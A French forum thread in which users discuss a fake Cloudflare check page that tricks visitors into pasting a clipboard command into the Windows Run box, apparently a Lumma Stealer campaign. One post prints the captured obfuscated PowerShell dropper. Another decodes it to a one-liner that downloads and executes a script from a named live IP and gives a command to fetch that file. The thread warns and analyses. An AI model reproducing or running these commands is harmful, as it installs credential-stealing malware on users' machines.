Une nouvelle saloperie ?
-
brunob
- Membre

- Messages : 896
- Enregistré le : 21 sept. 2022, 18:32
- Score de réactions : 127
- Dernière activité : il y a 29 minutes
- Âge : 65
Une nouvelle saloperie ?
Saluttatous.
En surfant "honnêtement" sur le web, je suis tombé sur une belle m... qui a dû en piéger un paquet à ce que je peux lire sur reddit notamment.
Une page se faisant passer pour cloudflare injecte dans le presse papiers un code malicieux "pour vérifier" te demande de faire win+R puis ctrl+V puis enter.
Si t'as le malheur de suivre les instructions tu lances une saloperie susceptible de voler tes identifiants (notamment les jetons qui remplacent les mots de passe) et de foutre le boxon dans tes comptes.
J'avais jamais entendu parler de cette vérole, heureusement que ces manip "bizarres" m'ont mis la puce à l'oreille on est tellement habitués à ces "cloudflares" surtout quand on est sous VPN qu'on se ferait facilement avoir.
En surfant "honnêtement" sur le web, je suis tombé sur une belle m... qui a dû en piéger un paquet à ce que je peux lire sur reddit notamment.
Une page se faisant passer pour cloudflare injecte dans le presse papiers un code malicieux "pour vérifier" te demande de faire win+R puis ctrl+V puis enter.
Si t'as le malheur de suivre les instructions tu lances une saloperie susceptible de voler tes identifiants (notamment les jetons qui remplacent les mots de passe) et de foutre le boxon dans tes comptes.
J'avais jamais entendu parler de cette vérole, heureusement que ces manip "bizarres" m'ont mis la puce à l'oreille on est tellement habitués à ces "cloudflares" surtout quand on est sous VPN qu'on se ferait facilement avoir.
-
kiki37
- Expérimenté ⭐⭐⭐

- Messages : 690
- Enregistré le : 02 févr. 2024, 00:07
- Score de réactions : 39
- Dernière activité : Aujourd’hui, 00:35
Re: Une nouvelle saloperie ?
Salut
Tiens, à propos de VPN : celui là n'est pas mal !
https://www.lesnumeriques.com/vpn/un-pu ... 41600.html
Tiens, à propos de VPN : celui là n'est pas mal !
https://www.lesnumeriques.com/vpn/un-pu ... 41600.html
"Qui dira toute la malice dont les choses sont capables lorsqu'elles cherchent à vous embêter ?"...E.Aisberg (son C.V.)
-
solar10
- Modérateur en chef

- Messages : 20556
- Enregistré le : 01 nov. 2017, 12:15
- Score de réactions : 594
- Dernière activité : Aujourd’hui, 07:27
- Localisation : https://www.liege.be/fr/evenements/agenda
- Âge : 62
Re: Une nouvelle saloperie ?

Internet: Edpnet VDSL XL [passé: _ - EDPNet - Scarlet - dxADSL - Scarlet One (NL) - Cybernet - Compuserve] + Fritz!Box 7530AX+4040
TV: TCL 50P616 UHD/HDR Android TV + Fransat CAM+Carte + TNT belge + Parabole multi-LNB (5°W + 13°E +19.2E + 28.2°E)
Tel Fixe: VOIP OVH (abonnement découverte) + 4x Fritz!Fon C5 + Clone Betamax
Tel Mobile: abo Base15 (eSIM) - Google Pixel 7a
NAS: Orange Pi 3 LTS avec boitier Fantec 4 baies, 26TB
Antipub: Pi Zero with DietPi + PiHole + Unbound
TV: TCL 50P616 UHD/HDR Android TV + Fransat CAM+Carte + TNT belge + Parabole multi-LNB (5°W + 13°E +19.2E + 28.2°E)
Tel Fixe: VOIP OVH (abonnement découverte) + 4x Fritz!Fon C5 + Clone Betamax
Tel Mobile: abo Base15 (eSIM) - Google Pixel 7a
NAS: Orange Pi 3 LTS avec boitier Fantec 4 baies, 26TB
Antipub: Pi Zero with DietPi + PiHole + Unbound
-
Unix-Linux
- Membre

- Messages : 11728
- Enregistré le : 10 nov. 2017, 21:50
- Score de réactions : 132
- Dernière activité : Hier, 20:52
Re: Une nouvelle saloperie ?
Non, ce n'est pas nouveau, ça circule via les forums clandestins depuis 2022
C'est un malware : Lumma Stealer
Démantèlement de Lumma Stealer : Microsoft conduit une action mondiale contre un outil prisé du cybercrime

Ajouté après : 12 minutes 53 secondes:
C'est un malware : Lumma Stealer
From to May 2025, Microsoft identified 394,000 computers that were infected with Lumma
Démantèlement de Lumma Stealer : Microsoft conduit une action mondiale contre un outil prisé du cybercrime

Ajouté après : 12 minutes 53 secondes:
You get what you pay forkiki37 a écrit : 29 août 2025, 14:57 Salut
Tiens, à propos de VPN : celui là n'est pas mal !![]()
https://www.lesnumeriques.com/vpn/un-pu ... 41600.html
Parabole Triax Multifeed 4 LNB + DAB+ RTL2832U R820T2 + CI Module
Base (Voo HFC - EDPnet VDSL XL - Brutele - RealRoot - Tvcablenet)
Raspberry Pi 4 : FreeBSD-arm64-aarch64
Raspberry Pi 4 : Gentoo arm64
Orange Pi 5 Ultra : DietPi + NAS
Server : Ubuntu LTS
Base (Voo HFC - EDPnet VDSL XL - Brutele - RealRoot - Tvcablenet)
Raspberry Pi 4 : FreeBSD-arm64-aarch64
Raspberry Pi 4 : Gentoo arm64
Orange Pi 5 Ultra : DietPi + NAS
Server : Ubuntu LTS
-
brunob
- Membre

- Messages : 896
- Enregistré le : 21 sept. 2022, 18:32
- Score de réactions : 127
- Dernière activité : il y a 29 minutes
- Âge : 65
Re: Une nouvelle saloperie ?
Mmmhh connaissais pas mais c'est vicieux surtout l'association avec cloudfire.
Pour le VPN j'ai NordVPN ça marche pas mal surtout ici pour les TV limitées géographiquement.
Faut juste les niquer en désactivant le renouvellement et reprendre un nouvel abo sinon le prix double !
Pour le VPN j'ai NordVPN ça marche pas mal surtout ici pour les TV limitées géographiquement.
Faut juste les niquer en désactivant le renouvellement et reprendre un nouvel abo sinon le prix double !
-
Unix-Linux
- Membre

- Messages : 11728
- Enregistré le : 10 nov. 2017, 21:50
- Score de réactions : 132
- Dernière activité : Hier, 20:52
Re: Une nouvelle saloperie ?
Pas compliqué, si le catchpa est véritablement provenant de cloudflare, c'est marqué dessus
Cloudfire ? Connais pas.

Cloudfire ? Connais pas.

Parabole Triax Multifeed 4 LNB + DAB+ RTL2832U R820T2 + CI Module
Base (Voo HFC - EDPnet VDSL XL - Brutele - RealRoot - Tvcablenet)
Raspberry Pi 4 : FreeBSD-arm64-aarch64
Raspberry Pi 4 : Gentoo arm64
Orange Pi 5 Ultra : DietPi + NAS
Server : Ubuntu LTS
Base (Voo HFC - EDPnet VDSL XL - Brutele - RealRoot - Tvcablenet)
Raspberry Pi 4 : FreeBSD-arm64-aarch64
Raspberry Pi 4 : Gentoo arm64
Orange Pi 5 Ultra : DietPi + NAS
Server : Ubuntu LTS
-
solar10
- Modérateur en chef

- Messages : 20556
- Enregistré le : 01 nov. 2017, 12:15
- Score de réactions : 594
- Dernière activité : Aujourd’hui, 07:27
- Localisation : https://www.liege.be/fr/evenements/agenda
- Âge : 62
Re: Une nouvelle saloperie ?
Pour les informaticiens, on sait très bien ce que l'enchaînement de commandes [Windows]+R > [CTRL]+V > [ENTER] fait. Surtout quand il y a un truc nasty dans le buffer du presse-papier.
Internet: Edpnet VDSL XL [passé: _ - EDPNet - Scarlet - dxADSL - Scarlet One (NL) - Cybernet - Compuserve] + Fritz!Box 7530AX+4040
TV: TCL 50P616 UHD/HDR Android TV + Fransat CAM+Carte + TNT belge + Parabole multi-LNB (5°W + 13°E +19.2E + 28.2°E)
Tel Fixe: VOIP OVH (abonnement découverte) + 4x Fritz!Fon C5 + Clone Betamax
Tel Mobile: abo Base15 (eSIM) - Google Pixel 7a
NAS: Orange Pi 3 LTS avec boitier Fantec 4 baies, 26TB
Antipub: Pi Zero with DietPi + PiHole + Unbound
TV: TCL 50P616 UHD/HDR Android TV + Fransat CAM+Carte + TNT belge + Parabole multi-LNB (5°W + 13°E +19.2E + 28.2°E)
Tel Fixe: VOIP OVH (abonnement découverte) + 4x Fritz!Fon C5 + Clone Betamax
Tel Mobile: abo Base15 (eSIM) - Google Pixel 7a
NAS: Orange Pi 3 LTS avec boitier Fantec 4 baies, 26TB
Antipub: Pi Zero with DietPi + PiHole + Unbound
-
Unix-Linux
- Membre

- Messages : 11728
- Enregistré le : 10 nov. 2017, 21:50
- Score de réactions : 132
- Dernière activité : Hier, 20:52
Re: Une nouvelle saloperie ?
solar10 a écrit : 29 août 2025, 16:58 Pour les informaticiens, on sait très bien ce que l'enchaînement de commandes [Windows]+R > [CTRL]+V > [ENTER] fait. Surtout quand il y a un truc nasty dans le buffer du presse-papier.
Parabole Triax Multifeed 4 LNB + DAB+ RTL2832U R820T2 + CI Module
Base (Voo HFC - EDPnet VDSL XL - Brutele - RealRoot - Tvcablenet)
Raspberry Pi 4 : FreeBSD-arm64-aarch64
Raspberry Pi 4 : Gentoo arm64
Orange Pi 5 Ultra : DietPi + NAS
Server : Ubuntu LTS
Base (Voo HFC - EDPnet VDSL XL - Brutele - RealRoot - Tvcablenet)
Raspberry Pi 4 : FreeBSD-arm64-aarch64
Raspberry Pi 4 : Gentoo arm64
Orange Pi 5 Ultra : DietPi + NAS
Server : Ubuntu LTS
-
brunob
- Membre

- Messages : 896
- Enregistré le : 21 sept. 2022, 18:32
- Score de réactions : 127
- Dernière activité : il y a 29 minutes
- Âge : 65
Re: Une nouvelle saloperie ?
J'ai glissé chef !Unix-Linux a écrit : 29 août 2025, 16:55 Pas compliqué, si le catchpa est véritablement provenant de cloudflare, c'est marqué dessus![]()
Cloudfire ? Connais pas.
![]()
Ajouté après : 4 minutes 39 secondes:
Le raccourci clavier m'a justement fait vachement tiquer, je les connais et je ne voyais pas pourquoi il aurait fallu lancer un trucsolar10 a écrit : 29 août 2025, 16:58 Pour les informaticiens, on sait très bien ce que l'enchaînement de commandes [Windows]+R > [CTRL]+V > [ENTER] fait. Surtout quand il y a un truc nasty dans le buffer du presse-papier.
Mais je n'avais jamais entendu que sans intervention un site puisse glisser un truc dans le presse papier !
On en apprend tous les jour malgré des années d'expérience !
-
stéphane
- Légendaire ⭐⭐⭐⭐⭐

- Messages : 4518
- Enregistré le : 30 nov. 2017, 21:27
- Score de réactions : 47
- Dernière activité : il y a 47 minutes
Re: Une nouvelle saloperie ?
CTRL v c'est un fameux Red flag quand-même
-
solitaire
- Expérimenté ⭐⭐⭐

- Messages : 657
- Enregistré le : 13 août 2022, 10:56
- Score de réactions : 28
- Dernière activité : il y a 31 minutes
- Âge : 69
Re: Une nouvelle saloperie ?
Capturé à l'instant..... (= ce qu'il y a dans 'un' Ctrl V)
!!! NE PAS EXECUTER !!!
powershell -window min [Text.Encoding]::UTF8.GetString([System.Runtime.Remoting.Metadata.W3cXsd2001.SoapHexBinary]::Parse('262867616c2063752a29202d7573656220687474703a2f2f3130342e3136342e35352e372f3039392f6d6f726f342e717c696578').Value)|powershell
si un pro peut nous dire où ça mène...!
!!! NE PAS EXECUTER !!!
powershell -window min [Text.Encoding]::UTF8.GetString([System.Runtime.Remoting.Metadata.W3cXsd2001.SoapHexBinary]::Parse('262867616c2063752a29202d7573656220687474703a2f2f3130342e3136342e35352e372f3039392f6d6f726f342e717c696578').Value)|powershell
si un pro peut nous dire où ça mène...!
-
solar10
- Modérateur en chef

- Messages : 20556
- Enregistré le : 01 nov. 2017, 12:15
- Score de réactions : 594
- Dernière activité : Aujourd’hui, 07:27
- Localisation : https://www.liege.be/fr/evenements/agenda
- Âge : 62
Re: Une nouvelle saloperie ?
Le matou GPT dit:
Cette ligne fait en fait trois choses :
1. Elle décode la chaîne hexadécimale
« 262867616c2063752a29202d7573656220687474703a2f2f3130342e3136342e35352e372f3039392f6d6f726f342e717c696578 »
en UTF-8 pour obtenir le texte suivant :
& (gal cu*) -useb http://104.164.55.7/099/moro4.q | iex
2. Elle pipe ce texte vers un nouvel appel PowerShell
3. Et ce texte, une fois exécuté, fait :
• `(gal cu*)` est équivalent à `Get-Alias cu*`, qui renvoie l’alias `curl` (alias de Invoke-WebRequest)
• `& ( … ) -UseBasicParsing http://…/moro4.q` lance donc `Invoke-WebRequest -UseBasicParsing` pour télécharger le fichier `moro4.q` depuis 104.164.55.7
• le résultat est ensuite piping dans `iex` (Invoke-Expression), c’est-à-dire exécuté comme du code PowerShell
En résumé, c’est un one-liner visant à récupérer à distance un script hébergé sur 104.164.55.7 et à l’exécuter immédiatement sur la machine.
Cette ligne fait en fait trois choses :
1. Elle décode la chaîne hexadécimale
« 262867616c2063752a29202d7573656220687474703a2f2f3130342e3136342e35352e372f3039392f6d6f726f342e717c696578 »
en UTF-8 pour obtenir le texte suivant :
& (gal cu*) -useb http://104.164.55.7/099/moro4.q | iex
2. Elle pipe ce texte vers un nouvel appel PowerShell
3. Et ce texte, une fois exécuté, fait :
• `(gal cu*)` est équivalent à `Get-Alias cu*`, qui renvoie l’alias `curl` (alias de Invoke-WebRequest)
• `& ( … ) -UseBasicParsing http://…/moro4.q` lance donc `Invoke-WebRequest -UseBasicParsing` pour télécharger le fichier `moro4.q` depuis 104.164.55.7
• le résultat est ensuite piping dans `iex` (Invoke-Expression), c’est-à-dire exécuté comme du code PowerShell
En résumé, c’est un one-liner visant à récupérer à distance un script hébergé sur 104.164.55.7 et à l’exécuter immédiatement sur la machine.
Internet: Edpnet VDSL XL [passé: _ - EDPNet - Scarlet - dxADSL - Scarlet One (NL) - Cybernet - Compuserve] + Fritz!Box 7530AX+4040
TV: TCL 50P616 UHD/HDR Android TV + Fransat CAM+Carte + TNT belge + Parabole multi-LNB (5°W + 13°E +19.2E + 28.2°E)
Tel Fixe: VOIP OVH (abonnement découverte) + 4x Fritz!Fon C5 + Clone Betamax
Tel Mobile: abo Base15 (eSIM) - Google Pixel 7a
NAS: Orange Pi 3 LTS avec boitier Fantec 4 baies, 26TB
Antipub: Pi Zero with DietPi + PiHole + Unbound
TV: TCL 50P616 UHD/HDR Android TV + Fransat CAM+Carte + TNT belge + Parabole multi-LNB (5°W + 13°E +19.2E + 28.2°E)
Tel Fixe: VOIP OVH (abonnement découverte) + 4x Fritz!Fon C5 + Clone Betamax
Tel Mobile: abo Base15 (eSIM) - Google Pixel 7a
NAS: Orange Pi 3 LTS avec boitier Fantec 4 baies, 26TB
Antipub: Pi Zero with DietPi + PiHole + Unbound
-
solitaire
- Expérimenté ⭐⭐⭐

- Messages : 657
- Enregistré le : 13 août 2022, 10:56
- Score de réactions : 28
- Dernière activité : il y a 31 minutes
- Âge : 69
Re: Une nouvelle saloperie ?
et le script dont question, il fait +- quoi?!
-
Unix-Linux
- Membre

- Messages : 11728
- Enregistré le : 10 nov. 2017, 21:50
- Score de réactions : 132
- Dernière activité : Hier, 20:52
Re: Une nouvelle saloperie ?
A récupérer des mots de passe, des cartes de crédit, des comptes bancaires et des portefeuilles de cryptomonnaies.
Parabole Triax Multifeed 4 LNB + DAB+ RTL2832U R820T2 + CI Module
Base (Voo HFC - EDPnet VDSL XL - Brutele - RealRoot - Tvcablenet)
Raspberry Pi 4 : FreeBSD-arm64-aarch64
Raspberry Pi 4 : Gentoo arm64
Orange Pi 5 Ultra : DietPi + NAS
Server : Ubuntu LTS
Base (Voo HFC - EDPnet VDSL XL - Brutele - RealRoot - Tvcablenet)
Raspberry Pi 4 : FreeBSD-arm64-aarch64
Raspberry Pi 4 : Gentoo arm64
Orange Pi 5 Ultra : DietPi + NAS
Server : Ubuntu LTS
-
solitaire
- Expérimenté ⭐⭐⭐

- Messages : 657
- Enregistré le : 13 août 2022, 10:56
- Score de réactions : 28
- Dernière activité : il y a 31 minutes
- Âge : 69
Re: Une nouvelle saloperie ?
et bien, ça c'est pas sympa !!
-
solar10
- Modérateur en chef

- Messages : 20556
- Enregistré le : 01 nov. 2017, 12:15
- Score de réactions : 594
- Dernière activité : Aujourd’hui, 07:27
- Localisation : https://www.liege.be/fr/evenements/agenda
- Âge : 62
Re: Une nouvelle saloperie ?
J'ai pas de machine Windows sous la main. Le matou GPT donne ces instructions pour le télécharger en sécurité :
Je ne peux pas télécharger directement ce script depuis l’extérieur (je n’ai pas d’accès réseau), mais je peux t’aider à l’analyser si tu me fournis son contenu.
Voici comment faire de ton côté, en PowerShell, en toute sécurité :
1. Ouvre une console PowerShell avec les droits appropriés (idéalement dans une machine virtuelle ou sandbox).
2. Télécharge le fichier sans l’exécuter :
Invoke-WebRequest -Uri "http://104.164.55.7/099/moro4.q" -UseBasicParsing -OutFile .\moro4.q
3. Ouvre ensuite le fichier avec un éditeur de texte ou affiche-le dans la console :
Get-Content .\moro4.q
4. Copie-colle-moi le contenu ici, et je te ferai une analyse détaillée (structures, appels externes, fonctions, éventuels comportements malveillants).
Si tu ne disposes pas d’un environnement isolé, ne l’exécute surtout pas avant d’avoir vérifié ce qu’il contient. Une fois le texte sous les yeux, je pourrai décrire chaque portion de code, expliquer les techniques utilisées et évaluer la dangerosité.
Donc, s'il ne fait pas des km, quelqu'un peu le coller ici ou l'envoyer via mp?
Added after 1 hour 38 minutes 47 seconds:
J'ai pu récupérer le fichier moro4.q mais je vois pas ce que ça fait.
Ah, j'ai dû contourner mes protections piHole pour y arriver. L'IP est apparemment connue comme nocive.
Internet: Edpnet VDSL XL [passé: _ - EDPNet - Scarlet - dxADSL - Scarlet One (NL) - Cybernet - Compuserve] + Fritz!Box 7530AX+4040
TV: TCL 50P616 UHD/HDR Android TV + Fransat CAM+Carte + TNT belge + Parabole multi-LNB (5°W + 13°E +19.2E + 28.2°E)
Tel Fixe: VOIP OVH (abonnement découverte) + 4x Fritz!Fon C5 + Clone Betamax
Tel Mobile: abo Base15 (eSIM) - Google Pixel 7a
NAS: Orange Pi 3 LTS avec boitier Fantec 4 baies, 26TB
Antipub: Pi Zero with DietPi + PiHole + Unbound
TV: TCL 50P616 UHD/HDR Android TV + Fransat CAM+Carte + TNT belge + Parabole multi-LNB (5°W + 13°E +19.2E + 28.2°E)
Tel Fixe: VOIP OVH (abonnement découverte) + 4x Fritz!Fon C5 + Clone Betamax
Tel Mobile: abo Base15 (eSIM) - Google Pixel 7a
NAS: Orange Pi 3 LTS avec boitier Fantec 4 baies, 26TB
Antipub: Pi Zero with DietPi + PiHole + Unbound
-
Darksky
- Membre

- Messages : 469
- Enregistré le : 04 sept. 2020, 10:47
- Score de réactions : 37
- Dernière activité : il y a 30 minutes
- Localisation : Région Mons
- Âge : 41
Re: Une nouvelle saloperie ?
Elle l'est, mais ne semble pas encore détectée par beaucoup d'AV actuellement.
Analyse VirusTotal
Après peut-être qu'à l'exécution, les autres AV chopent le truc.
PC principal:Ryzen 7 9800X3D/TUF Gaming RX 7800 XT/32Go/SSD Mint 22/ Win11 Portable: Lenovo IdeaPad Slim 5
Smartphone: OnePlus 12
Mobile: Hey! Mobile L
Internet: Hey!
Smartphone: OnePlus 12
Mobile: Hey! Mobile L
Internet: Hey!
-
Unix-Linux
- Membre

- Messages : 11728
- Enregistré le : 10 nov. 2017, 21:50
- Score de réactions : 132
- Dernière activité : Hier, 20:52
Re: Une nouvelle saloperie ?
Faudrait peut-être tout de même planquer cette adresse IP avant que le personnel de gestion informatique du spw walbonie ne clique dessus, pensant que c'est un download pour un antivirus gratuit contre la cyberttaque 
Parabole Triax Multifeed 4 LNB + DAB+ RTL2832U R820T2 + CI Module
Base (Voo HFC - EDPnet VDSL XL - Brutele - RealRoot - Tvcablenet)
Raspberry Pi 4 : FreeBSD-arm64-aarch64
Raspberry Pi 4 : Gentoo arm64
Orange Pi 5 Ultra : DietPi + NAS
Server : Ubuntu LTS
Base (Voo HFC - EDPnet VDSL XL - Brutele - RealRoot - Tvcablenet)
Raspberry Pi 4 : FreeBSD-arm64-aarch64
Raspberry Pi 4 : Gentoo arm64
Orange Pi 5 Ultra : DietPi + NAS
Server : Ubuntu LTS
